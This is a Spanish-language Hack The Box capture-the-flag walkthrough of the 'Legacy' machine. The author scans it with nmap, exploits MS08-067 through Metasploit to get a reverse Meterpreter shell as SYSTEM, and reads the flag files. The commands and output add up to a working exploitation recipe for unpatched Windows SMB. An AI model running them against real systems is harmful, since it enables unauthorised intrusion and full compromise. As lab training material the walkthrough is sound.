[HTB] Legacy

Hoy vamos a hackear la maquina de HTB llamada Legacy. Esta catalogada como facil.
  • Enumeration
  • sml@m0nikE:~/ctf/htb/machines/legacy$ sudo nmap -A -p- -sS 10.10.10.4 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-24 16:59 CET Nmap scan report for 10.10.10.4 Host is up (0.038s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows XP microsoft-ds 3389/tcp closed ms-wbt-server Device type: general purpose|specialized Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (87%) OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2 Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows XP SP2 or Windows Server 2003 (91%), Microsoft Windows 2003 SP2 (90%), Microsoft Windows XP SP2 or SP3 (90%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (90%), Microsoft Windows XP SP2 (89%), Microsoft Windows Server 2003 (89%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp Host script results: |_clock-skew: mean: 5d00h57m34s, deviation: 1h24m50s, median: 4d23h57m34s |_nbstat: NetBIOS name: LEGACY, NetBIOS user: , NetBIOS MAC: 00:50:56:b9:5d:9b (VMware) | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager) | OS CPE: cpe:/o:microsoft:windows_xp::- | Computer name: legacy | NetBIOS computer name: LEGACY\x00 | Workgroup: HTB\x00 |_ System time: 2019-11-29T19:58:39+02:00 | smb-security-mode: | account_used: | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) TRACEROUTE (using port 3389/tcp) HOP RTT ADDRESS 1 38.38 ms 10.10.14.1 2 38.46 ms 10.10.10.4 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 168.95 seconds
    Vemos que tiene el puerto 445 abierto asi que vamos a ver si tiene alguna vulnerabilidad usando los scripts de nmap smb-vuln*
    sml@m0nikE:~$ sudo nmap -sS --script smb-vuln* -p445 10.10.10.4 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-24 17:02 CET Nmap scan report for 10.10.10.4 Host is up (0.038s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-vuln-ms08-067: | VULNERABLE: | Microsoft Windows system vulnerable to remote code execution (MS08-067) | State: VULNERABLE | IDs: CVE:CVE-2008-4250 | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary | code via a crafted RPC request that triggers the overflow during path canonicalization. | | Disclosure date: 2008-10-23 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250 |_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug) | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannac rypt-attacks/ | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 |_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx Nmap done: 1 IP address (1 host up) scanned in 5.73 seconds
    Podemos ver que tiene vulnerabilidades... Para este caso vamos a usar MS08-067.
  • Exploitation
  • msf5 > search ms08-067 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption msf5 > use exploit/windows/smb/ms08_067_netapi msf5 exploit(windows/smb/ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 445 yes The SMB service port (TCP) SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 10.10.10.4 rhosts => 10.10.10.4 msf5 exploit(windows/smb/ms08_067_netapi) > exploit [*] Started reverse TCP handler on 10.10.14.13:4444 [*] 10.10.10.4:445 - Automatically detecting the target... [*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English [*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) [*] 10.10.10.4:445 - Attempting to trigger the vulnerability... [*] Sending stage (180291 bytes) to 10.10.10.4 [*] Meterpreter session 1 opened (10.10.14.13:4444 -> 10.10.10.4:1031) at 2019-11-24 17:03:37 +0100
    Ha funcionado, con lo cual ya tenemos una sesion abierta. Comprobamos nuestros privilegios en la maquina.
    meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
    Somos SYSTEM, asi que tenemos un usuario con privilegios. Hora de conseguir los flags.
  • user.txt
  • C:\>cd documents and settings cd documents and settings C:\Documents and Settings>dir dir Volume in drive C has no label. Volume Serial Number is 54BF-723B Directory of C:\Documents and Settings 29/11/2019 08:02 . 29/11/2019 08:02 .. 29/11/2019 08:02 0 10.10.10.4 16/03/2017 08:07 Administrator 16/03/2017 07:29 All Users 29/11/2019 08:02 0 exploit 16/03/2017 07:33 john 29/11/2019 08:01 0 search 29/11/2019 08:02 0 set 29/11/2019 08:01 0 show 29/11/2019 08:01 0 use 6 File(s) 0 bytes 5 Dir(s) 6.313.308.160 bytes free C:\Documents and Settings>cd john cd john C:\Documents and Settings\john>cd Desktop cd Desktop C:\Documents and Settings\john\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 54BF-723B Directory of C:\Documents and Settings\john\Desktop 16/03/2017 08:19 . 16/03/2017 08:19 .. 16/03/2017 08:19 32 user.txt 1 File(s) 32 bytes 2 Dir(s) 6.313.304.064 bytes free C:\Documents and Settings\john\Desktop>type user.txt e69af0e4f443de7e36876fda4ec76XXX
  • root.txt
  • C:\Documents and Settings>cd Administrator cd Administrator C:\Documents and Settings\Administrator>dir dir Volume in drive C has no label. Volume Serial Number is 54BF-723B Directory of C:\Documents and Settings\Administrator 16/03/2017 08:07 . 16/03/2017 08:07 .. 16/03/2017 08:18 Desktop 16/03/2017 08:07 Favorites 16/03/2017 08:07 My Documents 16/03/2017 07:20 Start Menu 0 File(s) 0 bytes 6 Dir(s) 6.313.295.872 bytes free C:\Documents and Settings\Administrator>cd Desktop cd Desktop C:\Documents and Settings\Administrator\Desktop>type root.txt 993442d258b0e0ec917cae9e695d5XXX
  • End
  • Y con esto ya tendriamos el flag del "user" y el flag de "root".